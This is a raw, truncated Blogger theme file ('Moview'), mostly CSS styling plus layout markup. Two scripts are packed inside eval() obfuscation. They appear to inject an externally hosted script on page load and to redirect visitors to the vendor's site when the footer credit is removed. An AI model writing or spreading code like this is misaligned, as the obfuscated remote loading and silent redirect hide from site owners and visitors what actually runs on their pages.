.post-body img{background:#fbfbfb;height:auto;max-width:100%;border:0;margin-bottom:2.0px;box-shadow:0 0 0 1px rgba(0,0,0,0.03);opacity:1;transition:all .6s ease;}
.post-body img:hover {opacity:0.99;}
.post-body a.img,.post-body .separator a {margin-left:0!important;margin-right:0!important;}
h3.post-title a,h2.post-title a,h1.post-title a,h3.post-title,h2.post-title,h1.post-title{color:#414042;}
.post-information{max-width:100%}
.label-info {opacity:1;visibility:visible;width:initial;height:initial;font-family: 'Poppins', sans-serif;color:#414042;font-size: 13px; font-weight: 600;text-transform: uppercase;}
.label-info a {background: #fff;color: #333; border: 1px solid #ddd; padding: 6px 10px; font-weight: 500; font-size: 11px; border-radius: 5px;}
#blog-pager {margin:0;padding-top:15px;}
a.blog-pager-newer-link,a.blog-pager-older-link,a.home-link{width:initial;height:initial;line-height:initial;padding:5px 0;margin:0;border:initial;}
#blog-pager-newer-link a,#blog-pager-older-link a{font-size:100%}
#sidebar-section {float:right;width:29%;opacity:1;visibility:visible;height:initial;}
.sidebar-inner {}
.sidebar .widget-content {background: #fff; overflow: hidden;}
.sidebar h2{font-family: 'Poppins', sans-serif; font-size: 14px; text-transform: uppercase; font-weight: 600; color: #333; padding-bottom: 15px; margin: 0; display: block;}
.sidebar-inner .widget {background:#fff;margin: 0 0 20px; border: 1px solid #eee; border-radius: 7px; padding: 15px; box-shadow: 0 2px 8px rgba(0,0,0,0.05);}
.sidebar ul, .sidebar ol {list-style-type:none;margin:0 0 0 0;padding:0;padding-top:0;}
.sidebar li {margin:5px 0;padding:0 0 0 0;}
.PopularPosts .widget-content ul li {padding: 10px 0; padding-top: 0; margin: 0;}
.PopularPosts .widget-content ul li:last-child {padding-bottom:0;}
#ArchiveList {font-size:95%;padding:0!important;}
#related-post {background: #fff;margin:0 auto;padding: 15px; border-bottom: 1px solid #eee;}
.relhead {font-size:100%;font-weight:normal;line-height:150%;overflow:hidden;}
.relhead h5 {}
#related-summary .news-text {display:none;visibility:hidden;opacity:0;position:absolute;top:-20px;left:0;text-align:left;background:rgba(0, 0, 0, 0.54);color:#fff;margin:10px;padding:10px;overflow:hidden;font-size:80%;max-height:110px;text-rendering:optimizeSpeed;text-overflow:ellipsis;}
#related-summary li:hover .news-text {top:0;visibility:visible;opacity:1;}
ul#related-summary {margin: 0; background: #fff; overflow: hidden; padding: 15px 0; padding-bottom: 0;}
ul#related-summary li {position: relative; float: left; list-style: none outside none; margin: 0 0 0 0; padding: 0; overflow: hidden; margin-right: 15px; width: 32%;}
ul#related-summary li:last-child {margin-right:0;}
ul#related-summary li a {display:block;}
ul#related-summary li img{background-color:#fafafa;height:auto;max-width:100%;margin:0 auto;vertical-align:middle;transition:all 1s ease-out}
ul#related-summary li img:hover {opacity:0.96;}
ul#related-summary li a.relinkjdulx{color:#444;display:block;font-size:13px;font-weight:bold;line-height:normal;overflow:hidden;text-align:left;padding:10px 5px;text-transform:none}
ul#related-summary li a.relinkjdulx:hover{color:#444;text-decoration:underline}
/*========================== CSS Responsive ==========================*/
@media only screen and (max-width:1024px){
ul#related-summary { margin: 0; overflow: hidden; position: relative; width:780px; }
.relhead { font-size: 100%; font-weight: normal; line-height: 150%; overflow: hidden; overflow-x: scroll; overflow-y: hidden; width: 100%; margin-bottom: 10px; }}
@media only screen and (max-width:768px){
#post-wrapper {float:none;width:100%;padding:0;}
.post {padding:20px 5px;}
#sidebar-section {float:none;width:100%;max-width:100%;margin-right:0;margin:0;}
.comment_avatar {display:none;}
.comment_body {margin-left:0;}
.comment_child .comment_inner {padding-left:15px;}
.tombol-berbagi-fb-label, .tombol-berbagi-tw-label, .tombol-berbagi-gp-label, .tombol-berbagi-lin-label,.avatar-container img{display:none;}}
@media only screen and (max-width:640px){
#content-wrapper {padding:0;}
.post,.breadcrumbs,.authorboxwrap,#comments,.simplepage {margin:0;}
.post-information {margin-bottom:20px;}}
@media screen and (max-width:480px) {
.share-post li{width:100%}}
@media only screen and (max-width:320px){
h3.post-title:before,h1.post-title:before,h3.post-title:after,h1.post-title:after,h3.post-title:after,h1.post-title:after,#comments .click-comment {visibility:hidden;}}
@media print {
body{padding:0}
#outer-wrapper {border-right:none;border-left:none;}
#post-wrapper{width:100%;margin:0 auto;}
.post-information {background:#fff;border:none;}
.post {background:#fff;margin:0 0 15px;padding:15px;border:none;}
h1.post-title {border-bottom:none;}
.post blockquote{background:transparent;color:#666;border:none;}
.breadcrumbs,.simplepage,#blog-pager,#comments,#footer-section,#header-wrapper{opacity:0;display:none;visibility:hidden;width:0;height:0;}
.status-msg-border{border:none;}}
</style>
<b:if cond='data:blog.pageType != "item"'>
<b:if cond='data:blog.pageType != "static_page"'>
<style type='text/css'>
.post{color: #404040; padding: 0; background: #fff;}
.post-body{overflow:hidden;text-overflow:ellipsis;height:150px;max-height:150px;font-size:95%;padding:15px 0;color:#99acb6;display:none;}
.post-image{overflow:hidden;background:#333;position:relative;width:100%;height:auto;margin:auto;padding:0;box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.22); border-radius: 7px;}
.post-image img{width:100%;vertical-align:middle;transition: 0.9s;-webkit-transition: opacity 1s, -webkit-transform 1s; transition: opacity 1s, transform 1s; -webkit-backface-visibility: hidden; backface-visibility: hidden;overflow: hidden; }
.post-image a.label-info{position:absolute;top:0;left:0;background-color:rgba(57,188,246,.9);padding:6px 9px;color:#fff;text-transform:uppercase;font-size:11px;display:none}
.post-image a.label-info:hover{background-color:rgba(57,188,246,1);color:#fff;text-decoration:underline}
.post-image a.label-info:nth-child(n+3) {display:none;}
.post-image a.comment-info{position:absolute;top:5px;right:8px;color:#fff;text-transform:uppercase;font-size:13px;display:none}
.post-image a.comment-info:hover{color:#fff;}
h3.post-title a, h2.post-title a, h1.post-title a, h3.post-title, h2.post-title, h1.post-title {text-align:left;font-size:15px;text-transform:none;color:#fff;margin:0}
.info {border-radius: 7px; border-top-right-radius: 0; border-top-left-radius: 0;}
.box-label a:nth-child(n+2){display:none;}
.box-title a {text-shadow: none;}
.box-title {padding: 15px 10px;}
.breadcrumbs {display:none;}
.post-outer {width: 30.66%; float: left; margin-right: 20px; margin-bottom: 20px;}
.post-information {font-weight:600;text-transform:none;text-align:left;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;}
.time-info {float:right;margin-right:initial;}
.post-information{margin: auto; font-size: 12px; color: #414042;}
.post-information a {display:inline;background:transparent;color:#fff;transition:all .3s ease-out;font-weight:600}
</style>
</b:if>
</b:if>
<b:if cond='data:blog.pageType == "static_page"'>
<style type='text/css'>
.post { margin: 0; padding: 20px; background: #fff; border: 1px solid #eee; }
.post img{background:#f9f9f9;height:auto;max-width:95%;border:0;margin-bottom:2.0px;box-shadow:none;transition:all 0.6s ease-out;}
.post img:hover {opacity:0.98;}
.post-information, .most-viewed2 {display:none;}
.author-info, .time-info, .label-info, .review-info, .post-information a {color:#fff;}
.breadcrumbs{opacity:0;visibility:hidden;width:0;height:0;}
@media print {
body{padding:0}
#outer-wrapper {border-right:none;border-left:none;}
#post-wrapper{width:100%;margin:0 auto;}
.post {background:#fff;margin:0 0 15px;padding:15px;}
.post blockquote{background:transparent;color:#666;border:none;}
.breadcrumbs,.simplepage,#blog-pager,#comments,#footer-section,#header-wrapper{display:none;visibility:hidden;width:0;height:0;}}
</style>
</b:if>
<b:if cond='data:blog.pageType == "error_page"'>
<style type='text/css'>
#outer-wrapper {visibility:hidden;opacity:0;width:0;height:0;}
/* CSS Custom Error Page */
#oopss {background:#333;text-align:center;margin-bottom:50px;font-weight:400;font-size:20px;font-family:'Poppins', sans-serif;position:fixed;width:100%;height:100%;line-height:1.5em;z-index:9999;}
#error-text {top:30%;position:relative;font-size:20px;color:#eee;}
#error-text a{color:#eee;}
#error-text a:hover{color:#fff;}
#error-text p {color:#eee;margin:50px 0 0 0;}
#error-text i {margin-left:10px;}
#error-text p.hmpg {margin:20px 0 0 0;}
#error-text span {position:relative;background:#f17c72;color:#fff;font-size:450%;padding:0 20px;border-radius:5px;font-family:'Poppins Condensed';font-weight:700;letter-spacing:3px;transition:all .5s}
#error-text span:hover {background:#d7401f;color:#fff;-webkit-animation:jelly .5s;-moz-animation:jelly .5s;-ms-animation:jelly .5s;-o-animation:jelly .5s;animation:jelly .5s;}
#error-text span:after {top:100%;left:50%;border:solid transparent;content:" ";height:0;
width:0;position:absolute;pointer-events:none;border-color:rgba(136,183,213,0);border-top-color:#f17c72;border-width:7px;margin-left:-7px;}
@-webkit-keyframes jelly{
from,to{-webkit-transform:scale(1,1);transform:scale(1,1)}25%{-webkit-transform:scale(.9,1.1);transform:scale(.9,1.1)}50%{-webkit-transform:scale(1.1,.9);transform:scale(1.1,.9)}75%{-webkit-transform:scale(.95,1.05);transform:scale(.95,1.05)}}
@keyframes jelly{
from,to{-webkit-transform:scale(1, 1);transform:scale(1,1)}25%{-webkit-transform:scale(.9,1.1);transform:scale(.9,1.1)}50%{-webkit-transform:scale(1.1,.9);transform:scale(1.1,.9)}75%{-webkit-transform:scale(.95, 1.05);transform:scale(.95, 1.05)}}
@media only screen and (max-width:640px){
#error-text span {font-size:200%;}
#error-text a:hover {color:#fff;}}
</style>
</b:if>
<script type='text/javascript'>
//<![CDATA[
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i a=["\\z\\f\\h\\j","\\e\\m\\d\\p\\d\\E\\m\\k\\n\\c\\d\\k\\A\\d\\b\\q\\l\\W\\l\\f\\h\\j\\e\\m\\d\\c\\p\\f\\j\\h\\n\\c\\r\\d\\d\\m\\f\\T\\b\\b\\l\\q\\l\\A\\o\\t\\v\\v\\t\\s\\k\\l\\m\\e\\f\\o\\h\\v\\w\\b\\l\\q\\l\\A\\b\\s\\e\\S\\f\\b\\q\\I\\G\\k\\j\\E\\b\\L\\o\\K\\o\\K\\b\\q\\I\\G\\k\\j\\E\\o\\w\\e\\P\\o\\q\\f\\c\\D\\z\\b\\f\\h\\j","\\e\\m\\d\\D","\\y\\j\\e\\d\\k","\\z\\e\\w\\t\\p\\y\\e\\16\\d\\r\\n\\c","\\c\\p\\r\\k\\e\\t\\r\\d\\n\\c","\\c\\p\\f\\j\\h\\n\\c","\\b\\f\\N\\L\\C\\h\\b","\\b\\y","\\C\\r","\\C\\h\\b","\\j\\k\\m\\s\\l\\h\\k","\\c\\p\\l\\s\\d\\n\\c","","\\c\\b\\D"];1c[a[3]](a[0]+a[1]+a[2]);i 15=4;i Z=u;i 17=u;i 18=u;i O=1b;i 1a=19;Y X(J,x){i B=R;i F=Q;H=a[4]+B+a[5]+F+a[6]+J[a[11]](a[7],a[8]+B+a[9]+F+a[10])+a[12]+x[a[11]](/"/g,a[13])+a[14];V(x!=a[13]){M H}U{M a[13]}}',62,75,'||||||||||_0x5cbd|x2F|x22|x74|x69|x73||x63|var|x72|x65|x61|x70|x3D|x2E|x20|x6A|x68|x6C|x67|true|x6F|x6D|_0xc845x9|x77|x3C|x78|_0xc845xa|x2D|x3E|x79|_0xc845xb|x75|image_tag|x71|_0xc845x8|x31|x32|return|x37|showpostsummary|x6E|290|230|x62|x3A|else|if|x76|postthumbnail|function|showpostttthumbnails||||||numposts|x64|showcommenttnum|showpostdate|180|numchars|false|document'.split('|'),0,{}))
//]]>
</script>
<b:if cond='data:blog.pageType != "item"'>
<b:if cond='data:blog.pageType != "static_page"'>
<script type='text/javascript'>
snippet_count = 140;
//<![CDATA[
function removeHtmlTag(n,e){if(-1!=n.indexOf("<")){for(var t=n.split("<"),i=0;i<t.length;i++)-1!=t[i].indexOf(">")&&(t[i]=t[i].substring(t[i].indexOf(">")+1,t[i].length));n=t.join("")}for(e=e<n.length-1?e:n.length-2;" "!=n.charAt(e-1)&&-1!=n.indexOf(" ",e);)e++;return n=n.substring(0,e-1),n+"..."}function createSnippet(n){var e=document.getElementById(n),t=snippet_count,i='<div class="snippets">'+removeHtmlTag(e.innerHTML,t)+"</div>";e.innerHTML=i}
//thumbnail
//]]>
</script>
</b:if>
</b:if>
<script type='text/javascript'>
//<![CDATA[
$(function() {
if ($("#bigframe").length > 0) {
var a = $(".single-post-title").text();
$("#titlevid").text(a);
var b = $("#bigframe").attr("src");
var c = '<iframe src="' + b + '" id="covervideo" frameborder="0"></iframe>';
$(c).appendTo("#myvideo");
$("#bigframe").remove();
} else $("#myvideo").remove();
});
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('y e=["\\v\\E\\k\\p\\l\\z\\C\\r\\k\\i\\B\\h\\k\\Y\\U\\l\\f\\G\\Y\\f\\G\\E\\u\\B\\j\\r\\x","\\U\\m\\l\\f\\h","\\h\\n\\f\\m\\K","\\H\\h\\h\\z","\\1Z\\f","\\f\\l\\f\\k\\h","\\f\\h\\m\\u","\\w\\i\\f\\h\\F\\q\\m\\K","\\k\\h\\n\\F\\f\\G","\\k\\l\\n\\1b","\\m\\h\\t\\k\\l\\h\\j","\\m\\h\\k","\\f\\h\\Z\\f\\A\\G\\f\\u\\k","\\f\\K\\t\\h","\\G\\m\\h\\H","\\i\\k\\f\\h\\m\\n\\i\\f\\h","\\E\\m\\k","\\u\\h\\z\\l\\i\\1Z\\f\\G\\E\\u\\B\\n\\i\\l\\k","\\w\\q\\n\\f\\h\\n\\f","\\v\\l\\u\\F","\\l\\n\\z\\h\\Z\\1I\\H","\\j\\m\\w\\C\\r","\\r","\\j\\E\\B\\j\\f\\m","","\\G\\f\\f\\t\\V\\A\\A\\1p\\N\\B\\t\\N\\B\\k\\q\\F\\j\\t\\q\\f\\N\\w\\q\\u\\A\\L\\1N\\2e\\2d\\1U\\1k\\1P\\2S\\1T\\K\\q\\F\\A\\2j\\2T\\q\\t\\q\\2P\\2O\\1p\\1u\\1R\\1J\\A\\X\\X\\X\\X\\X\\X\\X\\X\\2o\\2g\\1b\\A\\X\\1J\\K\\2e\\M\\m\\t\\2J\\2l\\n\\2d\\A\\j\\1o\\1O\\1u\\1u\\A\\t\\l\\w\\f\\E\\m\\h\\Y\\n\\q\\f\\Y\\i\\M\\i\\l\\k\\i\\B\\k\\h\\N\\t\\n\\F","\\t\\E\\B\\k\\l\\j\\G\\h\\z","\\j\\E\\B\\j\\f\\m\\l\\n\\F","\\1L\\i\\n","\\2q\\h\\B","\\1Q\\i\\m","\\X\\t\\m","\\1Q\\i\\K","\\1L\\E\\n\\h","\\1L\\E\\k\\K","\\X\\E\\F","\\1R\\h\\t\\f","\\1I\\w\\f","\\1G\\q\\M","\\2x\\h\\w","\\v\\k\\l\\p\\w\\k\\i\\j\\j\\C\\r\\m\\h\\w\\h\\n\\f\\L\\B\\q\\Z\\r\\x","\\v\\z\\l\\M\\p\\w\\k\\i\\j\\j\\C\\r\\l\\u\\i\\F\\h\\1k\\q\\n\\f\\i\\l\\n\\h\\m\\r\\x\\v\\i\\p\\G\\m\\h\\H\\C\\r","\\r\\p\\f\\i\\m\\F\\h\\f\\p\\C\\r\\Y\\f\\q\\t\\r\\x\\v\\l\\u\\F\\p\\w\\k\\i\\j\\j\\C\\r\\k\\i\\B\\h\\k\\Y\\f\\G\\E\\u\\B\\r\\p\\j\\m\\w\\C\\r","\\r\\p\\p\\i\\k\\f\\C\\r","\\r\\A\\x\\v\\A\\i\\x\\v\\A\\z\\l\\M\\x","\\v\\z\\l\\M\\p\\w\\k\\i\\j\\j\\C\\r\\l\\n\\H\\q\\r\\x\\v\\z\\l\\M\\p\\w\\k\\i\\j\\j\\C\\r\\B\\q\\Z\\L\\f\\l\\f\\k\\h\\r\\x\\v\\z\\l\\M\\p\\w\\k\\i\\j\\j\\C\\r\\B\\q\\Z\\L\\k\\i\\B\\h\\k\\r\\x","\\v\\A\\z\\l\\M\\x","\\v\\i\\p\\w\\k\\i\\j\\j\\C\\r\\k\\i\\B\\h\\k\\Y\\f\\l\\f\\k\\h\\r\\p\\G\\m\\h\\H\\C\\r","\\r\\p\\f\\i\\m\\F\\h\\f\\p\\C\\r\\Y\\f\\q\\t\\r\\x","\\v\\A\\i\\x","\\L","\\j\\t\\k\\l\\f","\\p","\\v\\i\\p\\G\\m\\h\\H\\C\\r","\\r\\p\\w\\k\\i\\j\\j\\C\\r\\t\\q\\j\\f\\L\\z\\i\\f\\h\\r\\x","\\p\\2I\\p","\\1o\\p\\1k\\q\\u\\u\\h\\n\\f\\j","\\1o\\p\\1k\\q\\u\\u\\h\\n\\f","\\1u\\p\\1k\\q\\u\\u\\h\\n\\f\\j","\\1G\\q\\p\\1k\\q\\u\\u\\h\\n\\f\\j","\\v\\i\\p\\w\\k\\i\\j\\j\\C\\r\\m\\h\\w\\h\\n\\f\\L\\w\\q\\u\\r\\p\\G\\m\\h\\H\\C\\r","\\v\\A\\i\\x\\v\\A\\z\\l\\M\\x\\v\\A\\z\\l\\M\\x","\\j\\E\\u\\u\\i\\m\\K","\\m\\h\\t\\k\\i\\w\\h","\\k\\i\\j\\f\\1J\\n\\z\\h\\Z\\1I\\H","\\v\\t\\p\\w\\k\\i\\j\\j\\C\\r\\t\\q\\j\\f\\L\\j\\E\\u\\u\\i\\m\\K\\r\\x","\\N\\N\\N\\v\\A\\t\\x","\\v\\A\\k\\l\\x","\\v\\A\\E\\k\\x","\\j\\m\\w","\\j\\1U\\1P\\L\\w","\\j\\1p\\1O\\1u","\\i\\f\\f\\m","\\N\\k\\i\\B\\h\\k\\Y\\f\\G\\E\\u\\B","\\m\\h\\i\\z\\K","\\z\\h\\H\\i\\E\\k\\f\\N\\1n\\t\\F","\\j\\z\\z\\h\\H\\i\\E\\k\\f\\N\\1n\\t\\F","\\v","\\x","\\1n\\q\\l\\n","\\1k\\m\\h\\i\\f\\h\\z\\p\\U\\l\\f\\G\\p\\v\\l\\p\\j\\f\\K\\k\\h\\C\\r\\w\\q\\k\\q\\m\\V\\1l\\H\\H\\1O\\1T\\2g\\z\\1i\\r\\p\\w\\k\\i\\j\\j\\C\\r\\H\\i\\p\\H\\i\\L\\G\\h\\i\\m\\f\\r\\x\\v\\A\\l\\x\\p\\B\\K\\p\\v\\i\\p\\G\\m\\h\\H\\C\\r\\G\\f\\f\\t\\j\\V\\A\\A\\U\\U\\U\\N\\f\\h\\u\\t\\k\\i\\f\\h\\u\\i\\m\\1b\\N\\w\\q\\u\\r\\p\\j\\f\\K\\k\\h\\C\\r\\M\\l\\j\\l\\B\\l\\k\\l\\f\\K\\V\\p\\M\\l\\j\\l\\B\\k\\h\\1e\\l\\u\\t\\q\\m\\f\\i\\n\\f\\1i\\p\\q\\t\\i\\w\\l\\f\\K\\V\\p\\1o\\1e\\l\\u\\t\\q\\m\\f\\i\\n\\f\\1i\\p\\t\\q\\j\\l\\f\\l\\q\\n\\V\\p\\m\\h\\k\\i\\f\\l\\M\\h\\1e\\l\\u\\t\\q\\m\\f\\i\\n\\f\\1i\\p\\1N\\L\\l\\n\\z\\h\\Z\\V\\p\\1o\\1e\\l\\u\\t\\q\\m\\f\\i\\n\\f\\1i\\p\\H\\q\\n\\f\\L\\j\\l\\1N\\h\\V\\p\\1o\\1P\\t\\Z\\1e\\l\\u\\t\\q\\m\\f\\i\\n\\f\\1i\\p\\w\\q\\k\\q\\m\\V\\p\\1l\\1p\\1p\\1p\\1e\\l\\u\\t\\q\\m\\f\\i\\n\\f\\1i\\r\\x\\2t\\h\\u\\t\\k\\i\\f\\h\\p\\1Q\\i\\m\\1b\\v\\A\\i\\x","\\G\\f\\u\\k","\\z\\l\\j\\t\\k\\i\\K","\\l\\n\\k\\l\\n\\h\\L\\B\\k\\q\\w\\1b","\\w\\j\\j","\\1l\\u\\j\\w\\q\\n\\f\\h\\n\\f","\\1l\\u\\j\\w\\q\\n\\f\\h\\n\\f\\V\\M\\l\\j\\l\\B\\k\\h","\\k\\q\\w\\i\\f\\l\\q\\n","\\G\\f\\f\\t\\j\\V\\A\\A\\U\\U\\U\\N\\f\\h\\u\\t\\k\\i\\f\\h\\u\\i\\m\\1b\\N\\w\\q\\u","\\A\\H\\h\\h\\z\\j\\A\\t\\q\\j\\f\\j\\A\\z\\h\\H\\i\\E\\k\\f\\2L\\i\\k\\f\\C\\1n\\j\\q\\n\\L\\l\\n\\L\\j\\w\\m\\l\\t\\f\\2M\\u\\i\\Z\\L\\m\\h\\j\\E\\k\\f\\j\\C","\\F\\h\\f","\\1n\\j\\q\\n\\t","\\j\\k\\l\\z\\h\\2x\\q\\U\\n","\\1l\\i\\z\\B\\m\\h\\i\\1b\\l\\n\\F\\n\\h\\U\\j\\p\\E\\k","\\i\\t\\t\\h\\n\\z\\2t\\q","\\j\\k\\l\\z\\h\\2j\\t","\\1l\\i\\z\\B\\m\\h\\i\\1b\\l\\n\\F\\n\\h\\U\\j\\p\\k\\l\\V\\H\\l\\m\\j\\f","\\v\\E\\k\\x","\\v\\k\\l\\x\\v\\i\\p\\G\\m\\h\\H\\C\\r","\\r\\p\\f\\i\\m\\F\\h\\f\\C\\r\\Y\\B\\k\\i\\n\\1b\\r\\x","\\v\\A\\i\\x\\v\\A\\k\\l\\x","\\1l\\i\\z\\B\\m\\h\\i\\1b\\l\\n\\F\\n\\h\\U\\j","\\v\\j\\t\\i\\n\\x\\1G\\q\\p\\m\\h\\j\\E\\k\\f\\1e\\v\\A\\j\\t\\i\\n\\x","\\v\\j\\f\\m\\q\\n\\F\\x\\2o\\m\\m\\q\\m\\p\\2l\\q\\i\\z\\l\\n\\F\\p\\2q\\h\\h\\z\\1e\\v\\A\\j\\f\\m\\q\\n\\F\\x","\\i\\1n\\i\\Z"];P 2K(1c){I[e[1]](e[0]);1m(y Q=0;Q<2k;Q++){y D=1c[e[3]][e[2]][Q];y 1g=D[e[5]][e[4]];y 1q;y 2s=1c[e[3]][e[2]][Q][e[7]][0][e[6]];J(Q==1c[e[3]][e[2]][e[8]]){1A};1m(y 1d=0;1d<D[e[9]][e[8]];1d++){J(e[10]==D[e[9]][1d][e[11]]&&e[12]==D[e[9]][1d][e[13]]){y 1j=D[e[9]][1d][e[5]];y 2c=D[e[9]][1d][e[14]]};J(e[15]==D[e[9]][1d][e[11]]){1q=D[e[9]][1d][e[14]];1A}};y 1t;2R{1t=D[e[17]][e[16]]}2Q(o){s=D[e[18]][e[4]];a=s[e[20]](e[19]);b=s[e[20]](e[21],a);c=s[e[20]](e[22],b+5);d=s[e[23]](b+5,c-b-5);J(a!=-1&&b!=-1&&c!=-1&&e[24]!=d){1t=d}1r{1t=e[25]}};y 1h=D[e[26]][e[4]];y 2U=1h[e[27]](0,4);y 2E=1h[e[27]](5,7);y 2z=1h[e[27]](8,10);y R=2A 2B();R[1]=e[28];R[2]=e[29];R[3]=e[30];R[4]=e[31];R[5]=e[32];R[6]=e[33];R[7]=e[34];R[8]=e[35];R[9]=e[36];R[10]=e[37];R[11]=e[38];R[12]=e[39];I[e[1]](e[40]);J(1z==2y){I[e[1]](e[41]+1q+e[2C]+1t+e[2F]+1g+e[2D])};I[e[1]](e[2H]+2s+e[2G]);I[e[1]](e[2N]+1q+e[2r]+1g+e[2f]);y 1C=e[24];y 1B=0;I[e[1]](e[24]);1h=D[e[26]][e[4]];y 1F=[1,2,3,4,5,6,7,8,9,10,11,12];y 1W=[e[28],e[29],e[30],e[31],e[32],e[33],e[34],e[35],e[36],e[37],e[38],e[39]];y 2a=1h[e[1v]](e[1E])[2][e[27]](0,2);y 1x=1h[e[1v]](e[1E])[1];y 2b=1h[e[1v]](e[1E])[0];1m(y 1s=0;1s<1F[e[8]];1s++){J(2V(1x)==1F[1s]){1x=1W[1s];1A}};y 1V=2a+e[1D]+1x+e[1D]+2b;J(1z==3T){I[e[1]](e[3S]+1q+e[3R]+1V+e[2f])};J(1z==3P){J(1==1B){1C+=e[3Q]};J(e[3U]==1j){1j=e[3Z]};J(e[3X]==1j){1j=e[3W]};1C+=1j;1B=1;I[e[1]](e[3Y]+2c+e[2r]+1j+e[3N])};J(e[18]2v D){y T=D[e[18]][e[4]]}1r{J(e[2u]2v D){y T=D[e[2u]][e[4]]}1r{y T=e[24]}};y 2w=/<\\S[^>]*>/g;T=T[e[1M]](2w,e[24]);J(1z==3l){J(T[e[8]]<2p){I[e[1]](e[24]);I[e[1]](T);I[e[1]](e[24])}1r{I[e[1]](e[24]);T=T[e[27]](0,2p);y 2i=T[e[3k]](e[1D]);T=T[e[27]](0,2i);I[e[1]](e[3j]+T+e[3i])}};I[e[1]](e[3O]);J(Q!=2k-1){I[e[1]](e[24])}};I[e[1]](e[1X])}$(I)[e[1y]](P(){$(e[2n])[e[2m]](e[1S],P(1f,1a){1K 1a[e[1M]](e[3m],e[3n])})});$(I)[e[1y]](P(){$(e[2n])[e[2m]](e[1S],P(1f,1a){1K 1a[e[1M]](e[3q],e[3p])})});P 3o(1f,1a){1m(y O=1f[e[1v]](e[3h]),W=0;W<O[e[8]];W++){-1!=O[W][e[20]](e[2h])&&(O[W]=O[W][e[27]](O[W][e[20]](e[2h])+1,O[W][e[8]]))};1K O=O[e[3g]](e[24]),O=O[e[27]](0,1a-1)}$(I)[e[1y]](P(){$(e[2Z])[e[2Y]](e[2X],e[2W])[e[1w]](e[3a]);1Y(P(){J(!$(e[3b])[e[8]]){3f[e[3e]][e[14]]=e[3d]}},3c)});$(I)[e[1y]](P(){y 1f=e[24],1a=20;$[e[3r]]({3s:e[24]+1f+e[3H]+1a,3G:e[3F],3E:e[3I],3J:P(1f){P 1a(){$(e[3M])[e[3L]](P(){$(3K)[e[3D]]($(e[3C]))[e[3w]]()})}y O,W,1c=e[24],Q=1f[e[3]][e[2]];J(3v(0)!==Q){1c=e[3u];1m(y D=0;D<Q[e[8]];D++){1m(y 1g=0;1g<Q[D][e[9]][e[8]];1g++){J(e[15]==Q[D][e[9]][1g][e[11]]){O=Q[D][e[9]][1g][e[14]];1A}};W=Q[D][e[5]][e[4]],1c+=e[3t]+O+e[3x]+W+e[3y]};1c+=e[1X],$(e[1H])[e[1w]](1c),1Y(P(){1a()},3B)}1r{$(e[1H])[e[1w]](e[3A])}},3z:P(){$(e[1H])[e[1w]](e[3V])}})})',62,250,'||||||||||||||_0x34cb|x74||x65|x61|x73|x6C|x69|x72|x6E||x20|x6F|x22||x70|x6D|x3C|x63|x3E|var|x64|x2F|x62|x3D|_0x78a2x4|x75|x67|x68|x66|document|if|x79|x2D|x76|x2E|_0x78a2x20|function|_0x78a2x3|_0x78a2x10||_0x78a2x1a|x77|x3A|_0x78a2x21|x41|x5F|x78|||||||||||_0x78a2x1e|x6B|_0x78a2x2|_0x78a2x8|x21|_0x78a2x1d|_0x78a2x5|_0x78a2xc|x3B|_0x78a2x9|x43|x23|for|x6A|x31|x33|_0x78a2x6|else|_0x78a2x18|_0x78a2xb|x30|51|81|_0x78a2x16|74|true|break|_0x78a2x12|_0x78a2x11|52|50|_0x78a2x13|x4E|101|x4F|x49|return|x4A|63|x7A|x36|x32|x4D|x53|69|x39|x37|_0x78a2x19|_0x78a2x14|68|setInterval|x24|||||||||||_0x78a2x15|_0x78a2x17|_0x78a2xa|x38|x50|49|x35|78|_0x78a2x1c|x55|numposts|x4C|72|73|x45|numchars|x46|48|_0x78a2x7|x54|62|in|_0x78a2x1b|x44|showpostttthumbnails|_0x78a2xf|new|Array|42|44|_0x78a2xe|43|46|45|x7C|x47|labelthumbs|x3F|x26|47|x59|x48|catch|try|x71|x56|_0x78a2xd|parseInt|83|82|84|85|||||||||||80|86|3000|88|87|window|79|77|66|65|64|showpostsummary|70|71|removeHtmlTag|76|75|104|url|98|97|void|92|99|100|error|102|5e3|93|94|dataType|90|type|89|91|success|this|95|96|61|67|showcommenttnum|55|54|53|showpostdate|56|103|59|58|60|57||'.split('|'),0,{}))
//]]>
</script>
</head>
<body>
<b:if cond='data:blog.pageType == "error_page"'>
<div id='oopss'>
<div id='error-text'>
<span>404</span>
<p>PAGE NOT FOUND!</p>
<p class='hmpg'>Back To Homepage <a href='/'><i class='fa fa-arrow-right'/></a></p>
</div>
</div>
</b:if>
<div class='topbar-wrapper'>
<header class='header2'>
<div class='top-wrappers'>
<nav class='top-gridnav'>
<div id='breakingnews'><span class='breakhead'><i class='fa fa-circle-o-notch fa-spin'/> Trending</span>
<div id='adbreakingnews'>Loading...</div></div>
<div class='top-navigation-right'>
<div class='top-social-wrapper'>
<div class='social-icon'><a href='#' target='_blank'><i class='fa fa-facebook'/></a></div>
<div class='social-icon'><a href='#' target='_blank'><i class='fa fa-twitter'/></a></div>
<div class='social-icon'><a href='#' target='_blank'><i class='fa fa-linkedin'/></a></div>
<div class='social-icon'><a href='#' target='_blank'><i class='fa fa-youtube-play'/></a></div>
<div class='social-icon'><a href='#' target='_blank'><i class='fa fa-pinterest-square'/></a></div>
</div>
</div>
<div class='clear'/>
</nav>
</div>
</header>
</div>
<div id='main-header'>
<div id='header-wrapper'>
<b:section class='header section' id='header' maxwidgets='1' showaddelement='no'>
<b:widget id='Header1' locked='true' title='Moview Blogger Template (Header)' type='Header' version='1'>
<b:widget-settings>
